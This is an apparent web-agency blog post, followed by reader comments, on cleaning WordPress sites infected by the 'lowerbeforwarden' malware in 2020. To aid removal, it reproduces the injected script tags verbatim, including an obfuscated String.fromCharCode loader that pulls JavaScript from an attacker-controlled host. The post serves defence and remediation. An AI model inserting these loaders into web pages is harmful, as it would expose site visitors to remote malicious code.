File Manager Hacked: Nasty new Malware doing the rounds – lowerbeforwarden
EDIT 6th Sept 2020 00:02: Due to the high volumes of requests for help with this virus, we’ve recorded a video detailing how to fix it. It’s a live run through of a real site, so the video is 50 minutes long, but will hopefully help people solve their issues
EDIT 5th Sept 2020 15:13: Wow this is affecting a lot of sites! Just done one that was slightly different. In the script the n=ns1 part was n=nb5 and this one had some encrypted code too (see further down). Also it had added an exclusion in the Wordfence advanced section to remain undetected
EDIT 5th Sept 2020 14:08: A zero day vulnerability was detected in the popular File Manager plugin and that’s one of the ways the virus was getting in. This has been patched – please update your File Manager plugin if you have it installed
A nasty new malware has started making the rounds. The virus seems to be targeting WordPress sites – this makes sense as not only does WordPress make up over 1/3 of the internet, but a lot of WordPress sites are out of date DIY builds.
Where most target a single vulnerability, the “lowerbeforwarden Virus” seems to use a number of known vulnerabilities.
It seemed to have only reared it’s ugly head on 31st August (2020), so it’s a bit early to tell a full list of vulnerabilities targeted or if this is a new day zero, but a quick search out there shows lots of site infected this week including:
- www.airlinehaber.com
- www.capitalone.com.vn
- lcps.org.uk
- megastararena.com
- www.aplapollo.com
- www.nahhs.com
How to remove the Lowerbeforwarden Virus from your site
1) The first step is damage limitation, so pop your hosting in maintenance mode or “suspend” the service. It’s better that your visitors see a temporarily unavailable message than some random site.
2) Take a full back-up of your code and database.
3) Download your site to your local machine and open the folder in a text editor such as Atom, Sublime, Dreamweaver, etc. Do a “find in files for the following code and then “replace all” with an empty field:
<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>
3B) Update: Some sites seem to have the n=ns1 bit replaced with n=nb5 and also have these scripts to remove in the same method:
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(script); elem.type = text/javascript elem.src = https://scripts.lowerbeforwarden.ml/src.jselem.appendAfter(document.getElementsByTagName(script)[0]);elem.appendAfter(document.getElementsByTagName(head)[0]);document.getElementsByTagName(head)[0].appendChild(elem);})();</script>
4) Once you’ve re-uploaded those files you should be able to login to WordPress again without getting redirected. Install the Wordfence plugin and run a scan to clean up any stray malicious files.
5) Some people have also reported having the same code in the database too, so you may need to open your database in something like PHPmyAdmin and run this sql command:
UPDATE wp_posts SET post_content = (REPLACE (post_content, โ<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>โ, ""));
Obviously if this all seems like too much, just give us a shout at [email protected] and we’ll fix it for you ๐
How to prevent it happening again
WordPress is one of the most updated CMSs going, so in most cases if you keep WordPress and the plugins updated you’ll be safe from this kind of virus. Keep Wordfence installed too as it’s a great 1st defence.
Oh my god you are a life saver thank you so much
More than welcome ๐
Got this virus in one of the sites i administer, I decided to just delete all theme and plugin files and do a wordpress reinstall to ensure.
I have found also in the assets/js folders of many of the plugins and other folders, to have all js files modified with an “append” code
Hey Andres
yeah that’s certainly one way to do it if the site is “stock”. Still do the wordfence scan though as some of the ones I’ve fixed have some mal files in the uploads folder too
Hi Chris, Watching your video now to ensure site is all set with security, thanks for this big contribution my friend.
You were totally right, we though we fixed it and yesterday night the malware ran again through a script on the uploads folder, amazing and tricky hack!
I did a whole server delete except upload files (pics only), and wpconfig as well, and recopied all new wordpress version and theme.
Things are going well and now running a wordfence scan.
Thanks for your help and follow up on this malware!
BTW we have also found a whole lot of this script in database like you mentioned in video.
muchas gracias thanks you!!!!
problem result for me,
problm in header.php to my theme
and in database I search lowerbeforwarden and deleted
thanks Dorset!
Thank you for this article! A real life saver indeed! ๐
Hi, I work for Dorset Tech, just so some people are aware some themes come with: Theme Options which allows you to change theme settings and styling specific for your theme. Sometimes it is best to export these options. Incase it loses some of the custom styling due to plugin deactivation etc, or you may just need to go back to theme options and Save Settings which i had to do on a site i was fixing from this nasty virus. Hope this helps someone ๐
When you go into the SQL and run the update query, yours doesn’t work at first. What was the problem you fixed to make it work? I have having the same issue. If I can’t get it to work, do I just go to every row that has the malicious script in it, and delete it?
Also, most of my infected files appear to be plugins, so can I just delete them all and then reinstall fresh versions?
If you ignore the syntax warning and run the script it’ll work fine. ๐ I tried to avoid the warning by using single quotes but it didn’t like that. There will be infected files outside of the plugins so best to the find/replace and wordfence method to be sure ๐
how do you ignore and run it anyway? I can’t seem to do it as it gives me an error every time.
So if you paste it exactly how I have written in the post, but make sure the double quotes (“) are actually ” as they can be affected. It’ll work fine.
The only exception is if your table has a different prefix, in which case you need to change that bit. Ignore the warning in that case ๐
Hello I also got the same problem this morning, pls how can I upload it on my SQL or can you please help me do it?
I’m ruining out of data…
Hey Aliyu
We’ve seen a few different variants of the virus this week, but all can be fixed by following the steps in this blog and video. We can of course help, but would need server logins and wordpress logins. Send us details at [email protected] and we’ll take a look.
OK sir, thank you very much.
I will send it now.
is it recommended to change database passwords etc after this infection?
I do as a precaution, but after looking through the encrypted code, they’re not taking any data, just leaving malicious files. Some people have reported a new Admin user from the attack, but that’s likely from another attack.
Hello Crhis, thank you so much for your help, i found in Uploads folder the initial problem:
a php archive called: wp-stream.php
and an archive called: Ite_
from there the virus expand itself, seems like this virus get an update or something similar, i found SQL orders on Ite_ archives to rename his code.
Thak you again!
I was affected by this but i cant find anything in the database.
I have had multiple files and folders created. One being a download folder in the public html directory with moban.html and index.html. I then had multiple gif’s which seem to actually be htaccess files. The attacker had added a google verification html file to the public html folder and used it to add many sitemaps/categorymaps and taken over control of google console.
There is also an assortment of other php files etc which i have removed. Although im not confident the backdoor has been closed. Any advice?
Usually i would just restore from backups but all my backups seem to be affected too..
oh that’s actually a different virus. Yeah there’s not normally anything in the database with that one. A Wordfence scan on the sensitive setting level should find all the files. Alternatively, if you’re running something like Plesk on the hosting, then you can install Imunify AV which is very good at detecting Malware.
You’ve ended my foีฝr day lะพng hunt!
God Bless you man. Have a great day!